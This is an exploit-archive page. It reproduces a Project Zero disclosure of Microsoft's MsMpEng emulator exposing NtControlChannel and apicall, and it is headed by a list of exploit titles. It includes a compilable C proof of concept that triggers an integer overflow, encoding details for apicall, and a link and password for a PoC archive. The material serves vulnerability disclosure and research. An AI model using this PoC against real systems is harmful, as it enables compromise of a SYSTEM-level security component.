ed0e1e4d44
1979 changes to exploits/shellcodes Couchdb 1.5.0 - 'uuids' Denial of Service Apache CouchDB 1.5.0 - 'uuids' Denial of Service Beyond Remote 2.2.5.3 - Denial of Service (PoC) udisks2 2.8.0 - Denial of Service (PoC) Termite 3.4 - Denial of Service (PoC) SoftX FTP Client 3.3 - Denial of Service (PoC) Silverstripe 2.3.5 - Cross-Site Request Forgery / Open redirection SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection Silverstripe CMS 3.0.2 - Multiple Vulnerabilities SilverStripe CMS 3.0.2 - Multiple Vulnerabilities Silverstripe CMS 2.4 - File Renaming Security Bypass SilverStripe CMS 2.4 - File Renaming Security Bypass Silverstripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities SilverStripe CMS 2.4.5 - Multiple Cross-Site Scripting Vulnerabilities Silverstripe CMS 2.4.7 - 'install.php' PHP Code Injection SilverStripe CMS 2.4.7 - 'install.php' PHP Code Injection Silverstripe Pixlr Image Editor - 'upload.php' Arbitrary File Upload SilverStripe CMS Pixlr Image Editor - 'upload.php' Arbitrary File Upload Silverstripe CMS 2.4.x - 'BackURL' Open Redirection SilverStripe CMS 2.4.x - 'BackURL' Open Redirection Silverstripe CMS - 'MemberLoginForm.php' Information Disclosure SilverStripe CMS - 'MemberLoginForm.php' Information Disclosure Silverstripe CMS - Multiple HTML Injection Vulnerabilities SilverStripe CMS - Multiple HTML Injection Vulnerabilities Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation Monstra CMS before 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (2) Monstra CMS < 3.0.4 - Cross-Site Scripting Monstra CMS < 3.0.4 - Cross-Site Scripting (1) Navigate CMS 2.8 - Cross-Site Scripting Collectric CMU 1.0 - 'lang' SQL injection Joomla! Component CW Article Attachments 1.0.6 - 'id' SQL Injection LG SuperSign EZ CMS 2.5 - Remote Code Execution MyBB Visual Editor 1.8.18 - Cross-Site Scripting Joomla! Component AMGallery 1.2.3 - 'filter_category_id' SQL Injection Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection RICOH Aficio MP 301 Printer - Cross-Site Scripting Joomla! Component Auction Factory 4.5.5 - 'filter_order' SQL Injection RICOH MP C6003 Printer - Cross-Site Scripting Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes) Linux/ARM - sigaction() Based Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (52 Bytes)
85 lines
No EOL
4.1 KiB
Text
85 lines
No EOL
4.1 KiB
Text
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1260
|
|
|
|
MsMpEng includes a full system x86 emulator that is used to execute any untrusted files that look like PE executables. The emulator runs as NT AUTHORITY\SYSTEM and isn't sandboxed.
|
|
|
|
Browsing the list of win32 APIs that the emulator supports, I noticed ntdll!NtControlChannel, an ioctl-like routine that allows emulated code to control the emulator.
|
|
|
|
You can simply create an import library like this and then call it from emulated code:
|
|
|
|
$ cat ntdll.def
|
|
LIBRARY ntdll.dll
|
|
EXPORTS
|
|
NtControlChannel
|
|
$ lib /def:ntdll.def /machine:x86 /out:ntdll.lib /nologo
|
|
Creating library ntdll.lib and object ntdll.exp
|
|
$ cat intoverflow.c
|
|
#include <windows.h>
|
|
#include <stdint.h>
|
|
#include <stdlib.h>
|
|
#include <limits.h>
|
|
|
|
#pragma pack(1)
|
|
|
|
struct {
|
|
uint64_t start_va;
|
|
uint32_t size;
|
|
uint32_t ecnt;
|
|
struct {
|
|
uint16_t opcode;
|
|
uint16_t flags;
|
|
uint32_t address;
|
|
} data;
|
|
} microcode;
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
microcode.start_va = (uint64_t) GetProcAddress; // just some trusted page
|
|
microcode.size = 1;
|
|
microcode.ecnt = (UINT32_MAX + 1ULL + 8ULL) / 8;
|
|
microcode.data.opcode = 0x310f; // rdtsc
|
|
microcode.data.flags = 0;
|
|
microcode.data.address = microcode.start_va;
|
|
NtControlChannel(0x12, µcode);
|
|
_asm rdtsc
|
|
return 0;
|
|
}
|
|
$ cl intoverflow.c ntdll.lib
|
|
Microsoft (R) C/C++ Optimizing Compiler Version 18.00.31101 for x86
|
|
Copyright (C) Microsoft Corporation. All rights reserved.
|
|
|
|
intoverflow.c
|
|
Microsoft (R) Incremental Linker Version 12.00.31101.0
|
|
Copyright (C) Microsoft Corporation. All rights reserved.
|
|
|
|
/out:intoverflow.exe
|
|
intoverflow.obj
|
|
ntdll.lib
|
|
|
|
|
|
It's not clear to me if this was intended to be exposed to attackers, but there are problems with many of the IOCTLs.
|
|
|
|
* Command 0x0C allows allows you to parse arbitrary-attacker controlled RegularExpressions to Microsoft GRETA (a library abandoned since the early 2000s). This library is not safe to process untrusted Regex, a testcase that crashes MsMpEng attached. Note that only packed executables can use RegEx, the attached sample was packed with UPX. ¯\_(ツ)_/¯
|
|
|
|
* Command 0x12 allows you to load additional "microcode" that can replace opcodes. At the very least, there is an integer overflow calculating number of opcodes provided (testcase attached). You can also redirect execution to any address on a "trusted" page, but I'm not sure I understand the full implications of that.
|
|
|
|
* Various commands allow you to change execution parameters, set and read scan attributes and UFS metadata (example attached). This seems like a privacy leak at least, as an attacker can query the research attributes you set and then retrieve it via scan result.
|
|
|
|
The password for all archives is "msmpeng".
|
|
|
|
################################################################################
|
|
|
|
I noticed additional routines (like NTDLL.DLL!ThrdMgr_SwitchThreads) that could not be imported, and looked into how they work.
|
|
|
|
It turns out the emulator defines a new opcode called "apicall" that has an imm32 operand. If you disassemble one of the routines that can be imported, you'll see a small stub that uses an undefined opcode - that is an apicall. To use the apicall instruction, you need to calculate crc32(modulename) ^ crc32(procname), and then use that as the 32 bit immediate operand.
|
|
|
|
If you think that sounds crazy, you're not alone.
|
|
|
|
So if we wanted to call NTDLL.DLL!MpUfsMetadataOp, we would need to calculate crc32("NTDLL.DLL") ^ crc32("MpUfsMetadataOp"), then encode that as 0x0f 0xff 0xf0 <result>. There is an example wrapper in C that demonstrates its usage below.
|
|
|
|
I'm planning to wait to see if Microsoft really intended to expose these additional apis to attackers before I audit more of them. It looks like the other architectures, like MSIL, also have an apicall instruction.
|
|
|
|
Filename: apicall.c
|
|
The password for all archives is "msmpeng"
|
|
|
|
Proof of Concept:
|
|
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42077.zip |